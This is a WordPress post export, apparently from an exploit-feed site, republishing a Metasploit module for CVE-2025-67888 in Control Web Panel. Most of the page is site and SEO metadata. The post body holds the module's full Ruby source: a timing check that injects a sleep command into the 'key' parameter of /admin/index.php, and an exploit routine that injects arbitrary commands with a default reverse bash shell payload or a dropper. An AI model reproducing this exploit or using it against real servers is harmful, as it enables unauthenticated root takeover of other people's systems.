{"id":35728,"date":"2026-01-14T13:44:44","date_gmt":"2026-01-14T13:44:44","guid":{"rendered":"http:\/\/localhost\/?p=35728"},"modified":"2026-01-14T13:44:44","modified_gmt":"2026-01-14T13:44:44","slug":"control-web-panel-adminindexphp-unauthenticated-rce","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=35728","title":{"rendered":"Control Web Panel \/admin\/index.php Unauthenticated RCE_MSF:EXPLOIT-LINUX-HTTP-CONTROL_WEB_PANEL_API_CMD_EXEC-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-14T19:32:12&#8243;,&#8221;description&#8221;:&#8221;Control Web Panel CWP versions use exploit\/linux\/http\/controlwebpanelapicmdexec msf exploitcontrolwebpanelapicmdexec show targets &#8230;targets&#8230; msf exploitcontrolwebpanelapicmdexec set TARGET msf exploitcontrolwebpanelapicmdexec show options &#8230;show&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-14T18:54:10&#8243;,&#8221;modified&#8221;:&#8221;2026-01-14T18:54:10&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Control Web Panel \/admin\/index.php Unauthenticated RCE&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-LINUX-HTTP-CONTROL_WEB_PANEL_API_CMD_EXEC-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2025-67888&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n  Rank = ExcellentRanking\\n\\n  prepend Msf::Exploit::Remote::AutoCheck\\n  include Msf::Exploit::Remote::HttpClient\\n  include Msf::Exploit::CmdStager\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Control Web Panel \/admin\/index.php Unauthenticated RCE&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          Control Web Panel (CWP) versions \\u003c= 0.9.8.1208 are vulnerable to\\n          unauthenticated OS command injection. User input passed via the\\n          \\&#8221;key\\&#8221; GET parameter to \/admin\/index.php (when the \\&#8221;api\\&#8221; parameter is set)\\n          is not properly sanitized before being used to execute OS commands.\\n          This can be exploited by unauthenticated attackers to inject and execute\\n          arbitrary OS commands with the privileges of the root user on the web server.\\n\\n          Successful exploitation usually requires \\&#8221;Softaculous\\&#8221; and\/or \\&#8221;SitePad\\&#8221;\\n          to be installed through the Scripts Manager.\\n        },\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Lukas Johannes M\u00f6ller&#8217;, # Metasploit module\\n          &#8216;Egidio Romano&#8217; # Vulnerability discovery\\n        ],\\n        &#8216;References&#8217; =\\u003e [\\n          [&#8216;CVE&#8217;, &#8216;2025-67888&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/karmainsecurity.com\/KIS-2025-09&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/www.cve.org\/CVERecord?id=CVE-2025-67888&#8217;],\\n          [&#8216;URL&#8217;, &#8216;https:\/\/control-webpanel.com&#8217;]\\n        ],\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2025-12-16&#8217;,\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Platform&#8217; =\\u003e [&#8216;linux&#8217;, &#8216;unix&#8217;],\\n        &#8216;Arch&#8217; =\\u003e ARCH_ALL,\\n        &#8216;Privileged&#8217; =\\u003e true,\\n        &#8216;Targets&#8217; =\\u003e [\\n          [\\n            &#8216;Unix Command&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e &#8216;unix&#8217;,\\n              &#8216;Arch&#8217; =\\u003e ARCH_ALL,\\n              &#8216;DefaultOptions&#8217; =\\u003e {\\n                &#8216;PAYLOAD&#8217; =\\u003e &#8216;cmd\/unix\/reverse_bash&#8217;\\n              },\\n              &#8216;Payload&#8217; =\\u003e {\\n                &#8216;Encoder&#8217; =\\u003e &#8216;cmd\/base64&#8217;,\\n                &#8216;BadChars&#8217; =\\u003e \\&#8221;\\\\x00\\\\x20\\&#8221;\\n              }\\n            }\\n          ],\\n          [\\n            &#8216;Linux Dropper&#8217;,\\n            {\\n              &#8216;Platform&#8217; =\\u003e &#8216;linux&#8217;,\\n              &#8216;Arch&#8217; =\\u003e ARCH_ALL\\n            }\\n          ]\\n        ],\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n        &#8216;DefaultOptions&#8217; =\\u003e {\\n          &#8216;SSL&#8217; =\\u003e true\\n        },\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e [IOC_IN_LOGS]\\n        }\\n      )\\n    )\\n\\n    register_options([\\n      Opt::RPORT(2031)\\n    ])\\n  end\\n\\n  def check\\n    sleep_time = rand(5..10)\\n\\n    print_status(\\&#8221;Checking vulnerability with sleep command (waiting #{sleep_time} seconds)&#8230;\\&#8221;)\\n\\n    res, elapsed_time = Rex::Stopwatch.elapsed_time do\\n      send_request_cgi(\\n        &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n        &#8216;uri&#8217; =\\u003e normalize_uri(&#8216;\/admin\/index.php&#8217;),\\n        &#8216;vars_get&#8217; =\\u003e {\\n          &#8216;api&#8217; =\\u003e &#8216;1&#8217;,\\n          &#8216;key&#8217; =\\u003e \\&#8221;$(sleep #{sleep_time})\\&#8221;\\n        }\\n      )\\n    end\\n\\n    vprint_status(\\&#8221;Elapsed time: #{elapsed_time.round(2)} seconds\\&#8221;)\\n\\n    return CheckCode::Unknown(&#8216;No response from server.&#8217;) unless res\\n    return CheckCode::Vulnerable(\\&#8221;Server waited #{elapsed_time.round(2)} seconds (expected \\u003e= #{sleep_time}).\\&#8221;) if elapsed_time \\u003e= sleep_time\\n\\n    CheckCode::Safe(\\&#8221;Server responded in #{elapsed_time.round(2)} seconds (expected \\u003e= #{sleep_time}).\\&#8221;)\\n  end\\n\\n  def exploit\\n    print_status(\\&#8221;Executing #{target.name} for #{datastore[&#8216;PAYLOAD&#8217;]}\\&#8221;)\\n\\n    case target[&#8216;Type&#8217;]\\n    when :unix_cmd\\n      execute_command(payload.encoded)\\n    when :linux_dropper\\n      execute_cmdstager\\n    end\\n  end\\n\\n  def execute_command(cmd, _opts = {})\\n    vprint_status(\\&#8221;Executing command: #{cmd}\\&#8221;)\\n\\n    send_request_cgi(\\n      &#8216;method&#8217; =\\u003e &#8216;GET&#8217;,\\n      &#8216;uri&#8217; =\\u003e normalize_uri(&#8216;\/admin\/index.php&#8217;),\\n      &#8216;vars_get&#8217; =\\u003e {\\n        &#8216;api&#8217; =\\u003e &#8216;1&#8217;,\\n        &#8216;key&#8217; =\\u003e \\&#8221;$(#{cmd})\\&#8221;\\n      }\\n    )\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/control_web_panel_api_cmd_exec.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:0,&#8221;severity&#8221;:&#8221;NONE&#8221;,&#8221;vector&#8221;:&#8221;NONE&#8221;,&#8221;version&#8221;:&#8221;NONE&#8221;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/control_web_panel_api_cmd_exec\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-01-14T19:32:12&#8243;,&#8221;description&#8221;:&#8221;Control Web Panel CWP versions use exploit\/linux\/http\/controlwebpanelapicmdexec msf exploitcontrolwebpanelapicmdexec show targets &#8230;targets&#8230; msf exploitcontrolwebpanelapicmdexec set TARGET msf exploitcontrolwebpanelapicmdexec show options &#8230;show&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-14T18:54:10&#8243;,&#8221;modified&#8221;:&#8221;2026-01-14T18:54:10&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Control Web Panel \/admin\/index.php Unauthenticated&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-35728","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Control Web Panel \/admin\/index.php Unauthenticated RCE_MSF:EXPLOIT-LINUX-HTTP-CONTROL_WEB_PANEL_API_CMD_EXEC- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=35728\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Control Web Panel \/admin\/index.php Unauthenticated RCE_MSF:EXPLOIT-LINUX-HTTP-CONTROL_WEB_PANEL_API_CMD_EXEC- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-01-14T19:32:12&#8243;,&#8221;description&#8221;:&#8221;Control Web Panel CWP versions use exploit\/linux\/http\/controlwebpanelapicmdexec msf exploitcontrolwebpanelapicmdexec show targets &#8230;targets&#8230; msf exploitcontrolwebpanelapicmdexec set TARGET msf exploitcontrolwebpanelapicmdexec show options &#8230;show&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-14T18:54:10&#8243;,&#8221;modified&#8221;:&#8221;2026-01-14T18:54:10&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Control Web Panel \/admin\/index.php Unauthenticated...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=35728\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-01-14T13:44:44+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35728#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35728\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Control Web Panel \\\/admin\\\/index.php Unauthenticated RCE_MSF:EXPLOIT-LINUX-HTTP-CONTROL_WEB_PANEL_API_CMD_EXEC-\",\"datePublished\":\"2026-01-14T13:44:44+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35728\"},\"wordCount\":757,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"exploit\",\"metasploit\",\"news\",\"NONE\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=35728#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35728\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35728\",\"name\":\"Control Web Panel \\\/admin\\\/index.php Unauthenticated RCE_MSF:EXPLOIT-LINUX-HTTP-CONTROL_WEB_PANEL_API_CMD_EXEC- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-01-14T13:44:44+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35728#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=35728\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=35728#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Control Web Panel \\\/admin\\\/index.php Unauthenticated RCE_MSF:EXPLOIT-LINUX-HTTP-CONTROL_WEB_PANEL_API_CMD_EXEC-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Control Web Panel \/admin\/index.php Unauthenticated RCE_MSF:EXPLOIT-LINUX-HTTP-CONTROL_WEB_PANEL_API_CMD_EXEC- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=35728","og_locale":"en_US","og_type":"article","og_title":"Control Web Panel \/admin\/index.php Unauthenticated RCE_MSF:EXPLOIT-LINUX-HTTP-CONTROL_WEB_PANEL_API_CMD_EXEC- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-01-14T19:32:12&#8243;,&#8221;description&#8221;:&#8221;Control Web Panel CWP versions use exploit\/linux\/http\/controlwebpanelapicmdexec msf exploitcontrolwebpanelapicmdexec show targets &#8230;targets&#8230; msf exploitcontrolwebpanelapicmdexec set TARGET msf exploitcontrolwebpanelapicmdexec show options &#8230;show&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-01-14T18:54:10&#8243;,&#8221;modified&#8221;:&#8221;2026-01-14T18:54:10&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Control Web Panel \/admin\/index.php Unauthenticated...","og_url":"https:\/\/zero.redgem.net\/?p=35728","og_site_name":"zero redgem","article_published_time":"2026-01-14T13:44:44+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=35728#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=35728"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Control Web Panel \/admin\/index.php Unauthenticated RCE_MSF:EXPLOIT-LINUX-HTTP-CONTROL_WEB_PANEL_API_CMD_EXEC-","datePublished":"2026-01-14T13:44:44+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=35728"},"wordCount":757,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","exploit","metasploit","news","NONE","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=35728#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=35728","url":"https:\/\/zero.redgem.net\/?p=35728","name":"Control Web Panel \/admin\/index.php Unauthenticated RCE_MSF:EXPLOIT-LINUX-HTTP-CONTROL_WEB_PANEL_API_CMD_EXEC- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-01-14T13:44:44+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=35728#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=35728"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=35728#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Control Web Panel \/admin\/index.php Unauthenticated RCE_MSF:EXPLOIT-LINUX-HTTP-CONTROL_WEB_PANEL_API_CMD_EXEC-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/35728","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=35728"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/35728\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=35728"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=35728"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=35728"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}